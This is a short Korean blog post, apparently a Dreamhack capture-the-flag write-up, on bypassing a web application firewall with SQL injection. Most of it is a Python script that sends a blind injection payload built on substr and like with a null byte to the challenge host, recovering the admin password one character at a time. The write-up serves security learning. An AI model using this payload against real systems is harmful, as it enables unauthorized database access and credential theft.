모의해킹/Dreamhack
sql injection bypass WAF Advanced [WEB LEVEL1]
철민1234
2023. 4. 18. 13:29
728x90
저번에 풀었던 SQL injection bypass WAF 문제랑 동일하다.
다른 점은 더 많은 문자열이 필터링되어 있다.
import requests
from string import ascii_letters, digits
a = ascii_letters + digits
url = "http://host3.dreamhack.games:13684/"
num = 0
ch =''
while True:
num += 1
for i in a:
param = {"uid":"'||substr(upw,"+str(num)+",1)like('"+str(i)+"');%00"}
req = requests.get(url,params=param)
if "admin" in req.text:
ch += i
print(ch)
break
저번에 작성한 쿼리문이 그대로 여기서도 실행이 되어 만들어놓은 페이로드를 실행시키면 flag 값을 받을 수 있다.